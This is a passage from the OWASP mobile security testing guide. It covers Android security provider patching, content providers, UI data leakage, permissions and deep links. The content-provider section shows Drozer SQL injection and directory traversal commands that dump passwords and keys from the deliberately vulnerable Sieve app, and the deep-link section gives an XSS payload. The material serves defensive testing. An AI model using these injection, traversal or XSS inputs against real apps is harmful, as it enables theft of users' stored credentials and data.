needs to be called by a component of the application as early as possible. Exceptions thrown by these methods should be caught and handled correctly. If the application cannot patch its security provider, it can either inform the API of its less secure state or restrict user actions (because all HTTPS traffic should be deemed riskier in this situation).
If you have access to the source code, check if the app handles any exceptions related to the security provider updates properly, and if it reports to the backend when the application is working with an unpatched security provider. The Android Developer documentation provides different examples showing how to update the Security Provider to prevent SSL exploits.
Lastly, make sure that NDK-based applications bind only to a recent and properly patched library that provides SSL/TLS functionality.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0023/#dynamic-analysis","title":"Dynamic Analysis","text":"When you have the source code:
Evaluate Expression
.Security.getProviders()
and press enter.GmsCore_OpenSSL
, which should be the new top-listed provider.When you do not have the source code:
java.security
package, then hook into java.security.Security
with the method getProviders
(with no arguments). The return value will be an array of Provider
.GmsCore_OpenSSL
.The first step is to look at AndroidManifest.xml
to detect content providers exposed by the app. You can identify content providers by the <provider>
element. Complete the following steps:
android:exported
) is \"true\"
. Even if it is not, the tag will be set to \"true\"
automatically if an <intent-filter>
has been defined for the tag. If the content is meant to be accessed only by the app itself, set android:exported
to \"false\"
. If not, set the flag to \"true\"
and define proper read/write permissions.android:permission
). Permission tags limit exposure to other apps.android:protectionLevel
attribute has the value signature
. This setting indicates that the data is intended to be accessed only by apps from the same enterprise (i.e., signed with the same key). To make the data accessible to other apps, apply a security policy with the <permission>
element and set a proper android:protectionLevel
. If you use android:permission
, other applications must declare corresponding <uses-permission>
elements in their manifests to interact with your content provider. You can use the android:grantUriPermissions
attribute to grant more specific access to other apps; you can limit access with the <grant-uri-permission>
element.Inspect the source code to understand how the content provider is meant to be used. Search for the following keywords:
android.content.ContentProvider
android.database.Cursor
android.database.sqlite
.query
.update
.delete
To avoid SQL injection attacks within the app, use parameterized query methods, such as query
, update
, and delete
. Be sure to properly sanitize all method arguments; for example, the selection
argument could lead to SQL injection if it is made up of concatenated user input.
If you expose a content provider, determine whether parameterized query methods (query
, update
, and delete
) are being used to prevent SQL injection. If so, make sure all their arguments are properly sanitized.
We will use the vulnerable password manager app Sieve as an example of a vulnerable content provider.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0007/#inspect-the-android-manifest","title":"Inspect the Android Manifest","text":"Identify all defined <provider>
elements:
<provider\n android:authorities=\"com.mwr.example.sieve.DBContentProvider\"\n android:exported=\"true\"\n android:multiprocess=\"true\"\n android:name=\".DBContentProvider\">\n <path-permission\n android:path=\"/Keys\"\n android:readPermission=\"com.mwr.example.sieve.READ_KEYS\"\n android:writePermission=\"com.mwr.example.sieve.WRITE_KEYS\"\n />\n</provider>\n<provider\n android:authorities=\"com.mwr.example.sieve.FileBackupProvider\"\n android:exported=\"true\"\n android:multiprocess=\"true\"\n android:name=\".FileBackupProvider\"\n/>\n
As shown in the AndroidManifest.xml
above, the application exports two content providers. Note that one path (\"/Keys\") is protected by read and write permissions.
Inspect the query
function in the DBContentProvider.java
file to determine whether any sensitive information is being leaked:
Example in Java:
public Cursor query(final Uri uri, final String[] array, final String s, final String[] array2, final String s2) {\n final int match = this.sUriMatcher.match(uri);\n final SQLiteQueryBuilder sqLiteQueryBuilder = new SQLiteQueryBuilder();\n if (match >= 100 && match < 200) {\n sqLiteQueryBuilder.setTables(\"Passwords\");\n }\n else if (match >= 200) {\n sqLiteQueryBuilder.setTables(\"Key\");\n }\n return sqLiteQueryBuilder.query(this.pwdb.getReadableDatabase(), array, s, array2, (String)null, (String)null, s2);\n}\n
Example in Kotlin:
fun query(uri: Uri?, array: Array<String?>?, s: String?, array2: Array<String?>?, s2: String?): Cursor {\n val match: Int = this.sUriMatcher.match(uri)\n val sqLiteQueryBuilder = SQLiteQueryBuilder()\n if (match >= 100 && match < 200) {\n sqLiteQueryBuilder.tables = \"Passwords\"\n } else if (match >= 200) {\n sqLiteQueryBuilder.tables = \"Key\"\n }\n return sqLiteQueryBuilder.query(this.pwdb.getReadableDatabase(), array, s, array2, null as String?, null as String?, s2)\n }\n
Here we see that there are actually two paths, \"/Keys\" and \"/Passwords\", and the latter is not being protected in the manifest and is therefore vulnerable.
When accessing a URI, the query statement returns all passwords and the path Passwords/
. We will address this in the \"Dynamic Analysis\" section and show the exact URI that is required.
To dynamically analyze an application's content providers, first enumerate the attack surface: pass the app's package name to the Drozer module app.provider.info
:
dz> run app.provider.info -a com.mwr.example.sieve\n Package: com.mwr.example.sieve\n Authority: com.mwr.example.sieve.DBContentProvider\n Read Permission: null\n Write Permission: null\n Content Provider: com.mwr.example.sieve.DBContentProvider\n Multiprocess Allowed: True\n Grant Uri Permissions: False\n Path Permissions:\n Path: /Keys\n Type: PATTERN_LITERAL\n Read Permission: com.mwr.example.sieve.READ_KEYS\n Write Permission: com.mwr.example.sieve.WRITE_KEYS\n Authority: com.mwr.example.sieve.FileBackupProvider\n Read Permission: null\n Write Permission: null\n Content Provider: com.mwr.example.sieve.FileBackupProvider\n Multiprocess Allowed: True\n Grant Uri Permissions: False\n
In this example, two content providers are exported. Both can be accessed without permission, except for the /Keys
path in the DBContentProvider
. With this information, you can reconstruct part of the content URIs to access the DBContentProvider
(the URIs begin with content://
).
To identify content provider URIs within the application, use Drozer's scanner.provider.finduris
module. This module guesses paths and determines accessible content URIs in several ways:
dz> run scanner.provider.finduris -a com.mwr.example.sieve\nScanning com.mwr.example.sieve...\nUnable to Query content://com.mwr.example.sieve.DBContentProvider/\n...\nUnable to Query content://com.mwr.example.sieve.DBContentProvider/Keys\nAccessible content URIs:\ncontent://com.mwr.example.sieve.DBContentProvider/Keys/\ncontent://com.mwr.example.sieve.DBContentProvider/Passwords\ncontent://com.mwr.example.sieve.DBContentProvider/Passwords/\n
Once you have a list of accessible content providers, try to extract data from each provider with the app.provider.query
module:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical\n_id: 1\nservice: Email\nusername: incognitoguy50\npassword: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64 - encoded)\nemail: incognitoguy50@gmail.com\n
You can also use Drozer to insert, update, and delete records from a vulnerable content provider:
dz> run app.provider.insert content://com.vulnerable.im/messages\n --string date 1331763850325\n --string type 0\n --integer _id 7\n
dz> run app.provider.update content://settings/secure\n --selection \"name=?\"\n --selection-args assisted_gps_enabled\n --integer value 0\n
dz> run app.provider.delete content://settings/secure\n --selection \"name=?\"\n --selection-args my_setting\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0007/#sql-injection-in-content-providers","title":"SQL Injection in Content Providers","text":"The Android platform promotes SQLite databases for storing user data. Because these databases are based on SQL, they may be vulnerable to SQL injection. You can use the Drozer module app.provider.query
to test for SQL injection by manipulating the projection and selection fields that are passed to the content provider:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection \"'\"\nunrecognized token: \"' FROM Passwords\" (code 1): , while compiling: SELECT ' FROM Passwords\n\ndz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection \"'\"\nunrecognized token: \"')\" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')\n
If an application is vulnerable to SQL Injection, it will return a verbose error message. SQL Injection on Android may be used to modify or query data from the vulnerable content provider. In the following example, the Drozer module app.provider.query
is used to list all the database tables:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection \"*\nFROM SQLITE_MASTER WHERE type='table';--\"\n| type | name | tbl_name | rootpage | sql |\n| table | android_metadata | android_metadata | 3 | CREATE TABLE ... |\n| table | Passwords | Passwords | 4 | CREATE TABLE ... |\n| table | Key | Key | 5 | CREATE TABLE ... |\n
SQL Injection may also be used to retrieve data from otherwise protected tables:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection \"* FROM Key;--\"\n| Password | pin |\n| thisismypassword | 9876 |\n
You can automate these steps with the scanner.provider.injection
module, which automatically finds vulnerable content providers within an app:
dz> run scanner.provider.injection -a com.mwr.example.sieve\nScanning com.mwr.example.sieve...\nInjection in Projection:\n content://com.mwr.example.sieve.DBContentProvider/Keys/\n content://com.mwr.example.sieve.DBContentProvider/Passwords\n content://com.mwr.example.sieve.DBContentProvider/Passwords/\nInjection in Selection:\n content://com.mwr.example.sieve.DBContentProvider/Keys/\n content://com.mwr.example.sieve.DBContentProvider/Passwords\n content://com.mwr.example.sieve.DBContentProvider/Passwords/\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0007/#file-system-based-content-providers","title":"File System Based Content Providers","text":"Content providers can provide access to the underlying filesystem. This allows apps to share files (the Android sandbox normally prevents this). You can use the Drozer modules app.provider.read
and app.provider.download
to read and download files, respectively, from exported file-based content providers. These content providers are susceptible to directory traversal, which allows otherwise protected files in the target application's sandbox to be read.
dz> run app.provider.download content://com.vulnerable.app.FileProvider/../../../../../../../../data/data/com.vulnerable.app/database.db /home/user/database.db\nWritten 24488 bytes\n
Use the scanner.provider.traversal
module to automate the process of finding content providers that are susceptible to directory traversal:
dz> run scanner.provider.traversal -a com.mwr.example.sieve\nScanning com.mwr.example.sieve...\nVulnerable Providers:\n content://com.mwr.example.sieve.FileBackupProvider/\n content://com.mwr.example.sieve.FileBackupProvider\n
Note that adb
can also be used to query content providers:
$ adb shell content query --uri content://com.owaspomtg.vulnapp.provider.CredentialProvider/credentials\nRow: 0 id=1, username=admin, password=StrongPwd\nRow: 1 id=2, username=test, password=test\n...\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/","title":"Checking for Sensitive Data Disclosure Through the User Interface","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#static-analysis","title":"Static Analysis","text":"Carefully review all UI components that either show such information or take it as input. Search for any traces of sensitive information and evaluate if it should be masked or completely removed.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#text-fields","title":"Text Fields","text":"To make sure an application is masking sensitive user input, check for the following attribute in the definition of EditText
:
android:inputType=\"textPassword\"\n
With this setting, dots (instead of the input characters) will be displayed in the text field, preventing the app from leaking passwords or pins to the user interface.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#app-notifications","title":"App Notifications","text":"When statically assessing an application, it is recommended to search for any usage of the NotificationManager
class which might be an indication of some form of notification management. If the class is being used, the next step would be to understand how the application is generating the notifications.
These code locations can be fed into the Dynamic Analysis section below, providing an idea of where in the application notifications may be dynamically generated.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#dynamic-analysis","title":"Dynamic Analysis","text":"To determine whether the application leaks any sensitive information to the user interface, run the application and identify components that could be disclosing information.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#text-fields_1","title":"Text Fields","text":"If the information is masked by, for example, replacing input with asterisks or dots, the app isn't leaking data to the user interface.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#app-notifications_1","title":"App Notifications","text":"To identify the usage of notifications run through the entire application and all its available functions looking for ways to trigger any notifications. Consider that you may need to perform actions outside of the application in order to trigger certain notifications.
While running the application you may want to start tracing all calls to functions related to the notifications creation, e.g. setContentTitle
or setContentText
from NotificationCompat.Builder
. Observe the trace in the end and evaluate if it contains any sensitive information.
A screenshot of the current activity is taken when an Android app goes into background and displayed for aesthetic purposes when the app returns to the foreground. However, this may leak sensitive information.
To determine whether the application may expose sensitive information via the app switcher, find out whether the FLAG_SECURE
option has been set. You should find something similar to the following code snippet:
Example in Java:
getWindow().setFlags(WindowManager.LayoutParams.FLAG_SECURE,\n WindowManager.LayoutParams.FLAG_SECURE);\n\nsetContentView(R.layout.activity_main);\n
Example in Kotlin:
window.setFlags(WindowManager.LayoutParams.FLAG_SECURE,\n WindowManager.LayoutParams.FLAG_SECURE)\n\nsetContentView(R.layout.activity_main)\n
If the option has not been set, the application is vulnerable to screen capturing.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0010/#dynamic-analysis","title":"Dynamic Analysis","text":"While black-box testing the app, navigate to any screen that contains sensitive information and click the home button to send the app to the background, then press the app switcher button to see the snapshot. As shown below, if FLAG_SECURE
is set (left image), the snapshot will be empty; if the flag has not been set (right image), activity information will be shown:
On devices supporting file-based encryption (FBE), snapshots are stored in the /data/system_ce/<USER_ID>/<IMAGE_FOLDER_NAME>
folder. <IMAGE_FOLDER_NAME>
depends on the vendor but most common names are snapshots
and recent_images
. If the device doesn't support FBE, the /data/system/<IMAGE_FOLDER_NAME>
folder is used.
Accessing these folders and the snapshots requires root.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/","title":"Testing for App Permissions","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#overview","title":"Overview","text":"When testing app permissions the goal is to try and reduce the amount of permissions used by your app to the absolute minimum. While going through each permission, remember that it is best practice first to try and evaluate whether your app needs to use this permission because many functionalities such as taking a photo can be done without, limiting the amount of access to sensitive data. If permissions are required you will then make sure that the request/response to access the permission is handled handled correctly.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/","title":"Testing for App Permissions","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#overview","title":"Overview","text":"When testing app permissions the goal is to try and reduce the amount of permissions used by your app to the absolute minimum. While going through each permission, remember that it is best practice first to try and evaluate whether your app needs to use this permission because many functionalities such as taking a photo can be done without, limiting the amount of access to sensitive data. If permissions are required you will then make sure that the request/response to access the permission is handled correctly.
permission in the AndroidManifest.xml file is necessary for an Activity to load a web page into a WebView. Because a user can revoke an application's right to use a dangerous permission, the developer should check whether the application has the appropriate permission each time an action is performed that would require that permission.
<uses-permission android:name=\"android.permission.INTERNET\" />\n
Go through the permissions with the developer to identify the purpose of every permission set and remove unnecessary permissions.
Besides going through the AndroidManifest.xml file manually, you can also use the Android Asset Packaging tool (aapt) to examine the permissions of an APK file.
aapt comes with the Android SDK within the build-tools folder. It requires an APK file as input. You may list the APKs in the device by running adb shell pm list packages -f | grep -i <keyword>
as seen in \"Listing Installed Apps\".
$ aapt d permissions app-x86-debug.apk\npackage: sg.vp.owasp_mobile.omtg_android\nuses-permission: name='android.permission.WRITE_EXTERNAL_STORAGE'\nuses-permission: name='android.permission.INTERNET'\n
Alternatively you may obtain a more detailed list of permissions via adb and the dumpsys tool:
$ adb shell dumpsys package sg.vp.owasp_mobile.omtg_android | grep permission\n requested permissions:\n android.permission.WRITE_EXTERNAL_STORAGE\n android.permission.INTERNET\n android.permission.READ_EXTERNAL_STORAGE\n install permissions:\n android.permission.INTERNET: granted=true\n runtime permissions:\n
Please reference this permissions overview for descriptions of the listed permissions that are considered dangerous.
READ_CALENDAR\nWRITE_CALENDAR\nREAD_CALL_LOG\nWRITE_CALL_LOG\nPROCESS_OUTGOING_CALLS\nCAMERA\nREAD_CONTACTS\nWRITE_CONTACTS\nGET_ACCOUNTS\nACCESS_FINE_LOCATION\nACCESS_COARSE_LOCATION\nRECORD_AUDIO\nREAD_PHONE_STATE\nREAD_PHONE_NUMBERS\nCALL_PHONE\nANSWER_PHONE_CALLS\nADD_VOICEMAIL\nUSE_SIP\nBODY_SENSORS\nSEND_SMS\nRECEIVE_SMS\nREAD_SMS\nRECEIVE_WAP_PUSH\nRECEIVE_MMS\nREAD_EXTERNAL_STORAGE\nWRITE_EXTERNAL_STORAGE\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#custom-permissions","title":"Custom Permissions","text":"Apart from enforcing custom permissions via the application manifest file, you can also check permissions programmatically. This is not recommended, however, because it is more error-prone and can be bypassed more easily with, e.g., runtime instrumentation. It is recommended that the ContextCompat.checkSelfPermission
method is called to check if an activity has a specified permission. Whenever you see code like the following snippet, make sure that the same permissions are enforced in the manifest file.
private static final String TAG = \"LOG\";\nint canProcess = checkCallingOrSelfPermission(\"com.example.perm.READ_INCOMING_MSG\");\nif (canProcess != PERMISSION_GRANTED)\nthrow new SecurityException();\n
Or with ContextCompat.checkSelfPermission
which compares it to the manifest file.
if (ContextCompat.checkSelfPermission(secureActivity.this, Manifest.READ_INCOMING_MSG)\n != PackageManager.PERMISSION_GRANTED) {\n //!= stands for not equals PERMISSION_GRANTED\n Log.v(TAG, \"Permission denied\");\n }\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#requesting-permissions","title":"Requesting Permissions","text":"If your application has permissions that need to be requested at runtime, the application must call the requestPermissions
method in order to obtain them. The app passes the permissions needed and an integer request code you have specified to the user asynchronously, returning once the user chooses to accept or deny the request in the same thread. After the response is returned the same request code is passed to the app's callback method.
private static final String TAG = \"LOG\";\n// We start by checking the permission of the current Activity\nif (ContextCompat.checkSelfPermission(secureActivity.this,\n Manifest.permission.WRITE_EXTERNAL_STORAGE)\n != PackageManager.PERMISSION_GRANTED) {\n\n // Permission is not granted\n // Should we show an explanation?\n if (ActivityCompat.shouldShowRequestPermissionRationale(secureActivity.this,\n //Gets whether you should show UI with rationale for requesting permission.\n //You should do this only if you do not have permission and the permission requested rationale is not communicated clearly to the user.\n Manifest.permission.WRITE_EXTERNAL_STORAGE)) {\n // Asynchronous thread waits for the users response.\n // After the user sees the explanation try requesting the permission again.\n } else {\n // Request a permission that doesn't need to be explained.\n ActivityCompat.requestPermissions(secureActivity.this,\n new String[]{Manifest.permission.WRITE_EXTERNAL_STORAGE},\n MY_PERMISSIONS_REQUEST_WRITE_EXTERNAL_STORAGE);\n // MY_PERMISSIONS_REQUEST_WRITE_EXTERNAL_STORAGE will be the app-defined int constant.\n // The callback method gets the result of the request.\n }\n} else {\n // Permission already granted debug message printed in terminal.\n Log.v(TAG, \"Permission already granted.\");\n}\n
Please note that if you need to provide any information or explanation to the user it needs to be done before the call to requestPermissions
, since the system dialog box can not be altered once called.
Now your app has to override the system method onRequestPermissionsResult
to see if the permission was granted. This method receives the requestCode
integer as input parameter (which is the same request code that was created in requestPermissions
).
The following callback method may be used for WRITE_EXTERNAL_STORAGE
.
@Override //Needed to override system method onRequestPermissionsResult()\npublic void onRequestPermissionsResult(int requestCode, //requestCode is what you specified in requestPermissions()\n String permissions[], int[] permissionResults) {\n switch (requestCode) {\n case MY_PERMISSIONS_WRITE_EXTERNAL_STORAGE: {\n if (grantResults.length > 0\n && permissionResults[0] == PackageManager.PERMISSION_GRANTED) {\n // 0 is a canceled request, if int array equals requestCode permission is granted.\n } else {\n // permission denied code goes here.\n Log.v(TAG, \"Permission denied\");\n }\n return;\n }\n // Other switch cases can be added here for multiple permission checks.\n }\n}\n
Permissions should be explicitly requested for every needed permission, even if a similar permission from the same group has already been requested. For applications targeting Android 7.1 (API level 25) and older, Android will automatically give an application all the permissions from a permission group, if the user grants one of the requested permissions of that group. Starting with Android 8.0 (API level 26), permissions will still automatically be granted if a user has already granted a permission from the same permission group, but the application still needs to explicitly request the permission. In this case, the onRequestPermissionsResult
handler will automatically be triggered without any user interaction.
For example if both READ_EXTERNAL_STORAGE
and WRITE_EXTERNAL_STORAGE
are listed in the Android Manifest but only permissions are granted for READ_EXTERNAL_STORAGE
, then requesting WRITE_EXTERNAL_STORAGE
will automatically have permissions without user interaction because they are in the same group and not explicitly requested.
Always check whether the application is requesting permissions it actually requires. Make sure that no permissions are requested which are not related to the goal of the app, especially DANGEROUS
and SIGNATURE
permissions, since they can affect both the user and the application if mishandled. For instance, it should be suspicious if a single-player game app requires access to android.permission.WRITE_SMS
.
When analyzing permissions, you should investigate the concrete use case scenarios of the app and always check if there are replacement APIs for any DANGEROUS
permissions in use. A good example is the SMS Retriever API which streamlines the usage of SMS permissions when performing SMS-based user verification. By using this API an application does not have to declare DANGEROUS
permissions which is a benefit to both the user and developers of the application, who doesn't have to submit the Permissions Declaration Form.
Permissions for installed applications can be retrieved with adb
. The following extract demonstrates how to examine the permissions used by an application.
$ adb shell dumpsys package com.google.android.youtube\n...\ndeclared permissions:\n com.google.android.youtube.permission.C2D_MESSAGE: prot=signature, INSTALLED\nrequested permissions:\n android.permission.INTERNET\n android.permission.ACCESS_NETWORK_STATE\ninstall permissions:\n com.google.android.c2dm.permission.RECEIVE: granted=true\n android.permission.USE_CREDENTIALS: granted=true\n com.google.android.providers.gsf.permission.READ_GSERVICES: granted=true\n...\n
The output shows all permissions using the following categories:
When doing the dynamic analysis:
android.permission.WRITE_SMS
, might not be a good idea.ACCESS_COARSE_LOCATION
permission instead of ACCESS_FINE_LOCATION
. Or even better not requesting the permission at all, and instead ask the user to enter a postal code.ACTION_IMAGE_CAPTURE
or ACTION_VIDEO_CAPTURE
intent action instead of requesting the CAMERA
permission.ACCESS_FINE_LOCATION
, ACCESS_COARSE_LOCATIION
, or BLUETOOTH_ADMIN
permissions.To obtain detail about a specific permission you can refer to the Android Documentation.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/","title":"Testing Deep Links","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/#overview","title":"Overview","text":"Any existing deep links (including App Links) can potentially increase the app attack surface. This includes many risks such as link hijacking, sensitive functionality exposure, etc.
All deep links must be enumerated and verified for correct website association. The actions they perform must be well tested, especially all input data, which should be deemed untrustworthy and thus should always be validated.
None of the input from these sources can be trusted; it must be validated and/or sanitized. Validation ensures processing of data that the app is expecting only. If validation is not enforced, any input can be sent to the app, which may allow an attacker or malicious app to exploit app functionality.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/#check-for-android-os-version","title":"Check for Android OS Version","text":"The Android version in which the app runs also influences the risk of using deep links. Inspect the Android Manifest to check if minSdkVersion
is 31 or higher.
Inspecting the Android Manifest:
You can easily determine whether deep links (with or without custom URL schemes) are defined by decoding the app using apktool and inspecting the Android Manifest file looking for <intent-filter>
elements.
myapp://
.<activity android:name=\".MyUriActivity\">\n <intent-filter>\n <action android:name=\"android.intent.action.VIEW\" />\n <category android:name=\"android.intent.category.DEFAULT\" />\n <category android:name=\"android.intent.category.BROWSABLE\" />\n <data android:scheme=\"myapp\" android:host=\"path\" />\n </intent-filter>\n</activity>\n
http://
and https://
schemes, along with the host and path that will activate it (in this case, the full URL would be https://www.myapp.com/my/app/path
):<intent-filter>\n ...\n <data android:scheme=\"http\" android:host=\"www.myapp.com\" android:path=\"/my/app/path\" />\n <data android:scheme=\"https\" android:host=\"www.myapp.com\" android:path=\"/my/app/path\" />\n</intent-filter>\n
<intent-filter>
includes the flag android:autoVerify=\"true\"
, this causes the Android system to reach out to the declared android:host
in an attempt to access the Digital Asset Links file in order to verify the App Links. A deep link can be considered an App Link only if the verification is successful.<intent-filter android:autoVerify=\"true\">\n
When listing deep links remember that <data>
elements within the same <intent-filter>
are actually merged together to account for all variations of their combined attributes.
<intent-filter>\n ...\n <data android:scheme=\"https\" android:host=\"www.example.com\" />\n <data android:scheme=\"app\" android:host=\"open.my.app\" />\n</intent-filter>\n
It might seem as though this supports only https://www.example.com
and app://open.my.app
. However, it actually supports:
https://www.example.com
app://open.my.app
app://www.example.com
https://open.my.app
Using Dumpsys:
Use adb to run the following command that will show all schemes:
adb shell dumpsys package com.example.package\n
Using Android \"App Link Verification\" Tester:
Use the Android \"App Link Verification\" Tester script to list all deep links (list-all
) or only app links (list-applinks
):
python3 deeplink_analyser.py -op list-all -apk ~/Downloads/example.apk\n\n.MainActivity\n\napp://open.my.app\napp://www.example.com\nhttps://open.my.app\nhttps://www.example.com\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/#check-for-correct-website-association","title":"Check for Correct Website Association","text":"Even if deep links contain the android:autoVerify=\"true\"
attribute, they must be actually verified in order to be considered App Links. You should test for any possible misconfigurations that might prevent full verification.
Use the Android \"App Link Verification\" Tester script to get the verification status for all app links (verify-applinks
). See an example here.
Only on Android 12 (API level 31) or higher:
You can use adb to test the verification logic regardless of whether the app targets Android 12 (API level 31) or not. This feature allows you to:
You can also review the verification results. For example:
adb shell pm get-app-links com.example.package\n\ncom.example.package:\n ID: 01234567-89ab-cdef-0123-456789abcdef\n Signatures: [***]\n Domain verification state:\n example.com: verified\n sub.example.com: legacy_failure\n example.net: verified\n example.org: 1026\n
The same information can be found by running adb shell dumpsys package com.example.package
(only on Android 12 (API level 31) or higher).
This section details a few, of potentially many, reasons why the verification process failed or was not actually triggered. See more information in the Android Developers Documentation and in the white paper \"Measuring the Insecurity of Mobile Deep Links of Android\".
Check the Digital Asset Links file:
/.well-known/
path. Example: https://www.example.com/.well-known/assetlinks.json
https://digitalassetlinks.googleapis.com/v1/statements:list?source.web.site=www.example.com
Check for Redirects:
To enhance the app security, the system doesn't verify any Android App Links for an app if the server sets a redirect such as http://example.com
to https://example.com
or example.com
to www.example.com
.
Check for Subdomains:
If an intent filter lists multiple hosts with different subdomains, there must be a valid Digital Asset Links file on each domain. For example, the following intent filter includes www.example.com
and mobile.example.com
as accepted intent URL hosts.
<application>\n <activity android:name=\u201dMainActivity\u201d>\n <intent-filter android:autoVerify=\"true\">\n <action android:name=\"android.intent.action.VIEW\" />\n <category android:name=\"android.intent.category.DEFAULT\" />\n <category android:name=\"android.intent.category.BROWSABLE\" />\n <data android:scheme=\"https\" />\n <data android:scheme=\"https\" />\n <data android:host=\"www.example.com\" />\n <data android:host=\"mobile.example.com\" />\n </intent-filter>\n </activity>\n</application>\n
In order for the deep links to correctly register, a valid Digital Asset Links file must be published at both https://www.example.com/.well-known/assetlinks.json
and https://mobile.example.com/.well-known/assetlinks.json
.
Check for Wildcards:
If the hostname includes a wildcard (such as *.example.com
), you should be able to find a valid Digital Asset Links file at the root hostname: https://example.com/.well-known/assetlinks.json
.
Even if the deep link is correctly verified, the logic of the handler method should be carefully analyzed. Pay special attention to deep links being used to transmit data (which is controlled externally by the user or any other app).
First, obtain the name of the Activity from the Android Manifest <activity>
element which defines the target <intent-filter>
and search for usage of getIntent
and getData
. This general approach of locating these methods can be used across most applications when performing reverse engineering and is key when trying to understand how the application uses deep links and handles any externally provided input data and if it could be subject to any kind of abuse.
The following example is a snippet from an exemplary Kotlin app decompiled with jadx. From the static analysis we know that it supports the deep link deeplinkdemo://load.html/
as part of com.mstg.deeplinkdemo.WebViewActivity
.
// snippet edited for simplicity\npublic final class WebViewActivity extends AppCompatActivity {\n private ActivityWebViewBinding binding;\n\n public void onCreate(Bundle savedInstanceState) {\n Uri data = getIntent().getData();\n String html = data == null ? null : data.getQueryParameter(\"html\");\n Uri data2 = getIntent().getData();\n String deeplink_url = data2 == null ? null : data2.getQueryParameter(\"url\");\n View findViewById = findViewById(R.id.webView);\n if (findViewById != null) {\n WebView wv = (WebView) findViewById;\n wv.getSettings().setJavaScriptEnabled(true);\n if (deeplink_url != null) {\n wv.loadUrl(deeplink_url);\n ...\n
You can simply follow the deeplink_url
String variable and see the result from the wv.loadUrl
call. This means the attacker has full control of the URL being loaded into the WebView (which, as shown above, has JavaScript enabled).
The same WebView might be also rendering an attacker controlled parameter. In that case, the following deep link payload would trigger Reflected Cross-Site Scripting (XSS) within the context of the WebView:
deeplinkdemo://load.html?attacker_controlled=<svg onload=alert(1)>\n
But there are many other possibilities. Be sure to check the following sections to learn more about what to expect and how to test different scenarios:
In addition, we recommend searching for and reading public reports (search term: \"deep link*\"|\"deeplink*\" site:https://hackerone.com/reports/
). For example:
Here you will use the list of deep links from the static analysis to iterate and determine each handler method and the processed data, if any. You will first start a Frida hook and then begin invoking the deep links.
The following example assumes a target app that accepts this deep link: deeplinkdemo://load.html
. However, we don't know the corresponding handler method yet, nor the parameters it potentially accepts.
[Step 1] Frida Hooking:
You can use the script \"Android Deep Link Observer\" from Frida CodeShare to monitor all invoked deep links triggering a call to Intent.getData
. You can also use the script as a base to include your own modifications depending on the use case at hand. In this case we included the stack trace in the script since we are interested in the method which calls Intent.getData
.
[Step 2] Invoking Deep Links:
Now you can invoke any of the deep links using adb and the Activity Manager (am) which will send intents within the Android device. For example:
adb shell am start -W -a android.intent.action.VIEW -d \"deeplinkdemo://load.html/?message=ok#part1\"\n\nStarting: Intent { act=android.intent.action.VIEW dat=deeplinkdemo://load.html/?message=ok }\nStatus: ok\nLaunchState: WARM\nActivity: com.mstg.deeplinkdemo/.WebViewActivity\nTotalTime: 210\nWaitTime: 217\nComplete\n
This might trigger the disambiguation dialog when using the \"http/https\" scheme or if other installed apps support the same custom URL scheme. You can include the package name to make it an explicit intent.
This invocation will log the following:
[*] Intent.getData() was called\n[*] Activity: com.mstg.deeplinkdemo.WebViewActivity\n[*] Action: android.intent.action.VIEW\n\n[*] Data\n- Scheme: deeplinkdemo://\n- Host: /load.html\n- Params: message=ok\n- Fragment: part1\n\n[*] Stacktrace:\n\nandroid.content.Intent.getData(Intent.java)\ncom.mstg.deeplinkdemo.WebViewActivity.onCreate(WebViewActivity.kt)\nandroid.app.Activity.performCreate(Activity.java)\n...\ncom.android.internal.os.ZygoteInit.main(ZygoteInit.java)\n
In this case we've crafted the deep link including arbitrary parameters (?message=ok
) and fragment (#part1
). We still don't know if they are being used. The information above reveals useful information that you can use now to reverse engineer the app. See the section \"Check the Handler Method\" to learn about things you should consider.
WebViewActivity.kt
com.mstg.deeplinkdemo.WebViewActivity
onCreate
Sometimes you can even take advantage of other applications that you know interact with your target app. You can reverse engineer the app, (e.g. to extract all strings and filter those which include the target deep links, deeplinkdemo:///load.html
in the previous case), or use them as triggers, while hooking the app as previously discussed.
